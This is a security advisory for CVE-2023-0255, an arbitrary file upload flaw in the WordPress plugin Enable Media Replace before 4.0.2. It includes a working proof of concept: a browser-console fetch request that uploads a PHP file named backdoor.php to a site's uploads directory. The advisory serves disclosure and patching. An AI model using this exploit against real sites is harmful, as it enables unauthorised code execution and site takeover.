Enable Media Replace < 4.0.2 – Author+ Arbitrary File Upload | CVE 2023-0255

Description

The plugin does not prevent authors from uploading arbitrary files to the site, which may allow them to upload PHP shells on affected sites.

Proof of Concept

1) As an Author, upload a picture via http://vulnerable-site.tld/wp-admin/upload.php
2) Press on the new picture's thumbnail to see the attachment's details
3) Click on "Upload a new file", next to "Replace media"
4) Paste the following in your browser's developer console:

```
await fetch(document.forms[0].action, {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
        "Content-Type": "multipart/form-data; boundary=---------------------------294159958331225347843177109147",
        "Upgrade-Insecure-Requests": "1"
    },
    "body": `-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"ID\"\r\n\r\n${document.forms[0].action.match(/attachment_id=(\d+)/)[1]}\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"backdoor.php\"\r\nContent-Type: text/php\r\n\r\n<?php phpinfo();\n\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"remove_bg\"\r\n\r\nyes\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"replace_type\"\r\n\r\nreplace_and_search\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"timestamp_replace\"\r\n\r\n2\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"custom_date\"\r\n\r\nJanuary 12, 2023\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"custom_hour\"\r\n\r\n18\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"custom_minute\"\r\n\r\n41\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"custom_date_formatted\"\r\n\r\n2023-01-12\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"location_dir\"\r\n\r\n2023/01\r\n-----------------------------294159958331225347843177109147--\r\n`,
    "method": "POST",
    "mode": "cors"
});
```

5) Check the wp-content/uploads/2023/01 directory for the backdoor.php file.